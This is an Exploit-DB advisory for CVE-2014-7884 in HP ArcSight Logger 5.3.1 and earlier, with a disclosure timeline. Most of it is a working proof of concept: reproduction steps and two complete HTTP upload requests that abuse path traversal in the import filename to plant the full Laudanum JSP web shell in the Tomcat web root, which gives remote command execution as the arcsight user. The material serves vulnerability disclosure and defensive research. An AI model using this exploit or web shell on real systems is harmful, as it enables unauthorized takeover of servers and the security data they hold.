ArcSight Logger - Arbitrary File Upload / Code Execution

EDB-ID:

36370


Platform:

Linux

Published:

2015-03-13

# Exploit Title: ArcSight Logger - Arbitrary File Upload (Code Execution)
# Date: 13.03.2015
# Exploit Author: Julian Horoszkiewicz
# Vendor Homepage: www.hp.com
# Software Link: http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/try-now.html
# Version: ArcSight Logger 5.3.1.6838.0 and prior versions
# Tested on: Red Hat Linux
# CVE: CVE-2014-7884

[ Description ]
Configuration import file upload capability does not fully sanitize file names, which allows attackers to put executable files into the document root. Upload of server side (JSP) script with shell accessing function in order to gain remote OS command execution has been conducted in the POC. To access vulnerable feature, user has to be authenticated in the console. Feature is available to all users, also non-administrative ones. Shell commands are executed with default NPA privileges (arcsight) giving full control over the service (for instance /etc/init.d/arcsight_logger stop has been successfully performed). The culprit feature is accessible to all authenticated users, including ones with sole read-only admin role.


[ Proof of Concept ]
Attention, to reproduce the attack for the first time, two requests are required.
First request magically creates subdirectory in the /opt/arcsight/current/backups upload dir.
Second one puts the actual JSP web shell into the document root, by using path traversal refering to the upload dir subdirectory.
Other combinations of direct name manipulation in order to upload anything to the document root did not succeed during the test (references to the upload dir without a subdirectory were refused by the application).
The only required difference between the requests to achieve successful upload into desired location is the filename property in the Content-Disposition HTTP header.

The general rule is as follows:
First request (create /opt/arcsight/current/backups/some_new_dir directory, the uploaded file is irrelevant):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/whatever"
Second request (upload the file into location of choice by traversally refering to that subdirectory):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"

Please also note that valid tokens (asf_token, session_string, JSESSIONID) are required.
The most efficient way to reproduce this is:
1) name the local JSP web shell file toanything.xml.gz extension
2) choose to import it in the Configuration->Content Management->Import section through the web browser
3) intercept the browser traffic with a local proxy (Burp Suite for instance)
4) change the filename property in the Content-Disposition header so it contains the name of new subdirectory and forward the request
5) send another copy of the same request, this time with filename referring to the subdirectory created with previous request, using path traversal to point into the Logger document root, successfully uploading the web shell.
6) Navigate the browser to http://victim.com:9000/logger/hellcode.jsp

Full requests:

POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565

-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"


-----------------------------17152166115305
Content-Disposition: form-data; name="update"

true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"

7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/hellcode.jsp"
Content-Type: application/x-gzip

<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>

-----------------------------17152166115305--







POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565

-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"


-----------------------------17152166115305
Content-Disposition: form-data; name="update"

true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"

7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
Content-Type: application/x-gzip

<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>

-----------------------------17152166115305--



[ Time line ]
28.08.2014 - vulnerability report sent to HP
21.01.2015 - new version containing the fix released by HP
12.03.2015 - security bulletin published (CVE-2014-7884)


[ Credits ]
Julian Horoszkiewicz - IT Security Specialist @ ING Services Polska